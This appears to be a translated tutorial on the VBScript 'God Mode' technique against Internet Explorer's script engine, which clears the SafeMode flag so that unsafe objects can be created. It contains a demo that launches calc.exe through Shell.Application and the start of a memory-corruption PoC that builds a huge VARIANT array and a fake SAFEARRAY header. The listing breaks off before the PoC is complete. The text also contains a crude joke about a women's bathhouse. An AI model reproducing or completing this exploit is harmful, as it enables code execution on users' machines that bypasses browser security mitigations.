How to use VBScript to turn on God Mode
What is God Mode?
The concept comes from yuange: once God Mode is turned on, we can do anything we want, say, walk invisibly into the women's bathhouse.
So what is God Mode, really?
When script running in the browser tries to create an object such as Shell.Application, the script engine first checks its SafeMode flag. With the flag set, CreateObject refuses any object that is not marked safe for scripting, so the call fails. With the flag cleared, the check no longer applies and the script can create whatever it likes: that is the essence of God Mode. yuange (a very skilled hacker) also calls this DVE (Data Virtual Execution): the payload is nothing but script executed by the engine, with no native code injected, so ASLR (Address Space Layout Randomization), DEP (Data Execution Prevention), EMET (Enhanced Mitigation Experience Toolkit), CFI (Control-Flow Integrity) and the rest of the memory-corruption mitigations never come into play.
What we are going to do is clear the SafeMode flag. (Note: all of the code that follows is VBScript.) First, a demo of what we want to be able to run:
<script type="text/javascript" language="VBScript">
' With SafeMode cleared this creates an unsafe object and launches calc.exe;
' with SafeMode set, the createobject call below is refused.
set sh=createobject("Shell.Application")
sh.ShellExecute "calc.exe"
</script>
The complete ..
VBScript has only one variable type, the VARIANT: every value is a 16-byte cell whose first word is a type tag (vt) and whose payload is interpreted according to that tag. Corrupt the tag and an integer becomes a pointer, which is why type confusion is so easy here.
Next is a demo PoC from promised_lu.
<script type="text/javascript" language="VBScript">
Class Exploit
    Private m_Address   ' the address the PoC aims at
    Private m_Array()   ' the big VARIANT array used for the corruption
    Private m_Index

    Private Sub Class_Initialize
        m_Address = &H08000020
        ' First dim a big array: (&H08000000 - 32) / 16 elements of 16 bytes each,
        ' so its storage spans almost &H08000000 bytes.
        ReDim m_Array((&H08000000 - 32) / 16 - 1)
        ' Fake SAFEARRAY header, one %uXXXX word per 16 bits in memory order:
        ' cDims = 1, fFeatures = &H0880 (FADF_HAVEVARTYPE Or FADF_VARIANT), ...
        ' (the listing breaks off partway through the string)
        Fake = Unescape("%u0001%u0880%u7fff")
............